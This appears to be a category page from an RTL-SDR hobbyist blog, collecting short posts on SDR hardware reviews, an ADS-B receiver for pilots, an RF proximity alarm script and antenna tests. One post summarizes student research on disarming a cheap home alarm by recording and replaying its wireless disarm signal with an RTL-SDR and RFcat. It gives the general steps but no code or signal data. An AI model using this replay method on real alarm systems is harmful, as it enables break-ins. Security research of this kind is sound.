Category: RTL-SDR

Hacking Alarm Systems with an RTL-SDR and RFcat

Back in 2014 the author of boredhackerblog.blogspot.com did a final year project for his wireless security class on hacking home alarm systems. His presentation was titled “How we broke into your house”. In his research the author used both an RTL-SDR and a simple RFcat wireless transmitter and performs a simple replay attack on a cheap $50 alarm system. His process for reverse engineering the alarm was essentially:

  1. Look up the device frequency and listen to it with an RTL-SDR and SDR#.
  2. Record the signal and visually study the waveform in Audacity.
  3. Look up system part info and determine encoding type (e.g. ASK/OOK)
  4. Determine the bit string and baud rate.
  5. Program the RFcat to send the same disarm binary string.

Once again research like this shows that cheap home alarm systems have literally zero protections against wireless attacks. In a previous post we also showed how the popular Simplisafe wireless alarm system could be disarmed in a somewhat similar way.

$50 home alarm system broken by an RTL-SDR and RFcat.
$50 home alarm system broken by an RTL-SDR and RFcat.

RTLSDR4Everyone: Review of the Nooelec Ham-It-Up V1.3 and Balun 1:9

Over on his blog rtlsdr4everyone, Akos has posted two new reviews. One post reviews the latest ham-it-up v.13 upconverter and the other reviews the “Balun 1:9” impedance transformer.

An upconverter allows you to receive HF frequencies (0-30 MHz) with an RTL-SDR which has a lower frequency limit of 24 MHz.  The ham-it-up upconverter was one of the first upconverters to go on the market that targeted users of the popular RTL-SDR dongle. Over the years the ham-it-up has slowly been revised and now it is up at version 1.3. The biggest changes in the latest version are a revised design that uses the ADE-1 in reverse (better VLF operation), a presoldered oscillator and it also now includes the previously optional noise source by default. 

In his review Akos compares the ham-it-up v1.3 to the older v1.2 model. His results show that the revised design seems to have better immunity to noise and better FM broadcast filtering. He also tests out the new battery power via connection and shows that using battery power is less noisy.

Previously we posted a review comparing the ham-it-up v1.0, SpyVerter and Nobu’s Japanese upconverter. Although the ham-it-up v1.3 is much improved and we have not tested it, we still believe the SpyVerter is the better upconverter choice at the moment due to its better architectural design and included metal case, though Akos does point out that the ham-it-up is currently about $15 USD cheaper and has a passthrough switch.

Ham-it-up v1.3 vs ham-it-up v1.2
Ham-it-up v1.3 vs ham-it-up v1.2

In his second post Akos reviews the Balun 1:9 which is a $10 balun that is designed for attaching a long wire antenna to the ham-it-up. The goal of the balun 1:9 is to transform the high impedance long wire antenna down to around 50/75 Ohms for the receiver. In Akos’ results he writes that he mostly see’s identical or better performance with the balun connected.

The Nooelec balun 1:9
The Nooelec balun 1:9

To add to Akos’ review, we want to note that we think that there might be some confusion over baluns and ununs. We wonder if a 9:1 unun (instead of a balun) should be used for a long wire antenna, since a long wire is an unbalanced antenna. We think a balun should be used for a balanced antenna such as a dipole. In his review Akos also found that connecting two longwire antennas to the spring terminals improved reception. This may have possibly been because adding two longwires essentially created a balanced dipole antenna. To implement a longwire antenna unun with a balun, we think that the second terminal and coax shield should be connected to a good ground source like a cold water pipe. If you have knowledge on this topic please comment to confirm or expand on our theory.

FlightBox: Commercial RTL-SDR Based ADS-B (1090ES & 978UAT) Receiver for Pilots

For some time now, small aircraft pilots who don’t have access to expensive ~$1000+ ADS-B gear have been successfully using an RTL-SDR and Raspberry Pi combination to receive ADS-B and UAT to display aircraft and weather data on an iPad. The first time we posted about this was back in August 2015.

The full implementation uses two RTL-SDR dongles to receive both 1090ES aircraft position information and 978 UAT to receive weather radar information. Both dongles are used on a Raspberry Pi mini computer that runs a program called Statrux. Stratux takes the ADS-B information received by the RTL-SDR’s and re-transmits the data out via WiFi. Then an iPad running special pilot navigation aid software such as ForeFlight can interface with the WiFi signal and receive the ADS-B and weather information.

Assembly of a Stratux box requires the purchase of each individual component or a Raspberry Pi kit that includes the stratux software image on an SD card, RTL-SDR and WiFi adapter. However, setting up a Stratux box may be a little difficult for pilots who do not have any electronics DIY skills.

To solve this, a new product called FlightBox recently ran a successful Kickstarter campaign. FlightBox provides a ruggedized plastic case, a Raspberry Pi 2 preloaded with software, two nano RTL-SDR dongles, two pigtail adapters, a 10Hz WAAS GPS module, and two customized ADS-B whip antennas (one for 978 MHz and one for 1090 MHz).

The FlightBox costs $200 for single band operation and $250 for dual band (1090ES and 978UAT). They are currently accepting pre-orders for delivery in late March/April.

For more information about Stratux see the active discussion forum at reddit.com/r/stratux.

The FlightBox: An RTL-SDR based ADS-B 1090ES and 978UAT receiver for Pilots.
The FlightBox: An RTL-SDR based ADS-B 1090ES and 978UAT receiver for Pilots.
Components used in the FlightBox, including two RTL-SDR dongles.
Components used in the FlightBox, including two nano RTL-SDR dongles.

Creating an RF Proximity Alarm (Close Call) with an RTL-SDR

“Close Call” is a feature that some radio scanners have which notifies the user when there is a radio transmitter that is in the near vicinity (such as from a police radio). It works by detecting the strength of signals from near field emissions, and it requires a strong RF signal to trigger.

Over on the ar15.com forums, user seek2 wanted something similar to the “close call” feature, but didn’t want certain transmissions like APRS signals from hams driving by to set it off. He also didn’t want to be restricted to near field emissions, rather he wanted something that acted more like a squelch that would activate for strong signals only.

To implement this seek2 used an RTL-SDR dongle, together with the rtl_power spectrum scanning software. He outputs the signal strength data generated by rtl_power to a CSV file which is then piped into a tail -f terminal command in Linux which simply outputs the latest lines of the CSV file as it updates in real time. Then he uses a simple Python script to monitor the output and to set off an alarm and report strong signals when it see’s them. His script is also used to filter out reports from strong unwanted signals like APRS.

Below is a video showing an example of Close Call working on a Uniden hardware radio scanner for reference.

Uniden CloseCall© What is it? How does it work? How well does it perform?

Comparing LHCP and RHCP Reception of a Thuraya Satellite with an RTL-SDR and MIX4ALL

Over on YouTube Adam Alicajic 9A4QV (creator of the popular LNA4ALL) has uploaded a video showing a comparison of reception of Thuraya satellites with a LHCP (left hand circular polarization) and RHCP (right hand circular polarization) patch antennas. To receive Thuraya satellites, a LHCP antenna should be used, and Adam’s results show that using an antenna with the wrong polarization (RHCP) produces a signal that is as theoretically expected almost 20dB lower. Shortly after initially posting this Adam wrote in to comment on the following:

Thuraya LHCP original patch antenna have 2 patches stacked inside the panel antenna and the hand made RHCP patch antenna is made only of 1 patch. Theoretically, this should give the 3dB more gain for the Thuraya antenna.

The difference in the received signal due to polarization should be (theoretically) 20dB, thats RHCP vs. LHCP and I experience some 18dB of difference which is good result. Why not 20dB? First of all it is impossible to get 3dB more gain stacking the antennas, this is just the theory, more likely 2db in the practice.

To receive the signals Adam uses the patch antennas, which are connected to the MIX4ALL (a downconverter that he is currently developing), which is then connected to a RTL-SDR dongle.

In the first video Adam shows the difference the wrong polarization makes, and in the second he shows some information about the Thuraya LCHP antenna he uses.

Receiving Thuraya sat - LHCP and RHCP comparison using MIX4ALL

Thuraya antenna L-band + GSM

RTLSDR4Everyone: Avoiding RTL-SDR Rip-Offs

Akos from the rtlsdr4everyone blog has come up with a new post that aims to help people avoid getting ripped off when trying to buy an RTL-SDR dongle. He shows that there are several sellers on eBay who sell branded products (like Nooelec and our own RTL-SDR Blog brand) for higher prices and higher shipping costs than the official manufacturer. He also notes that there are several sellers falsely advertising E4000 dongles, selling custom units that are too expensive and sellers that stuff in popular keywords to wrongly get to the top of rankings with an inflated price.

We’d like to add the following to Akos’ post: We believe these sellers offering our and other brands products at higher prices on marketplaces like eBay are simple market arbitrage bots that scrape items listed on Amazon and then list them on eBay for a higher price. They write that they can ship overseas, but they are simply using an address forwarder (like shipito, viabox or the eBay global shipping program) to forward the goods from the USA to overseas. Note that we ship overseas via our Chinese warehouse for free, so there is no need to use an address forwarder and pay high shipping costs.

We’d also like to note that we now have three companies who legitimately resell our dongle only units locally in the UKJapan and in India. They may charge higher prices as they must contend with import costs and business taxes, but the advantage is fast local shipping and local support.

Don't get ripped off by scammy sellers.
Don’t get ripped off by scammy sellers.

Getting SDR# and RTL-SDR to run on OSX El Capitan with Mono

A few weeks ago Matthew Miller showed us how it was possible to run DSD+ in OSX using a program called Wineskin. Now he’s uploaded a new video that shows how to get SDR# working in OSX El Capitan with Mono. SDR# is designed to be used in Windows, but since it is written in C# under the .NET framework, it should be possible to run it on OSX with the open source Mono .NET implementation. The overall installation is not as straight forward as simply downloading a zip file like it is on Windows, but the tutorial Matthew provides is clear and easy to follow.

The steps involve downloading SDR#, downloading Mono, installing MacPorts, installing PortAudi, installing the RTL-SDR libraries and then setting up some required symbolic links. Finally he shows that to access the RTL-SDR you must first run RTL-TCP and then connect to that using the RTL-SDR (TCP) option in SDR#.

SDR# on MAC OSX EL CAPITAN - RTL SDR - MONO

RTLSDR4Everyone: Review of 5 RTL-SDR Dongles

Over on the rtlsdr4everyone blog (previously known as the sdr4mariners blog), author Akos has uploaded a new post that compares 5 different RTL-SDR dongles against one another. He compares a Terratec R820T, Black Nooelec R820T, Blue Nooelec R820T2, our own RTL-SDR Blog R820T2 and a Nooelec Nano R820T.

In the post Akos gives an overview of the features of each dongle, and runs tests on things like frequency drift and broadcast FM interference. He also runs SNR tests on Airband, low UHF, high UHF signals and shortwave frequencies. His tests show that the dongles with the R820T2 chip outperform the dongles with the R820T chip by about 4-5 dBs in SNR, and that the overall best dongle is our RTL-SDR Blog dongle.

In the future Akos hopes to also review the Nooelec 9:1 balun.

dongles_all
The dongles compared in Akos’ Review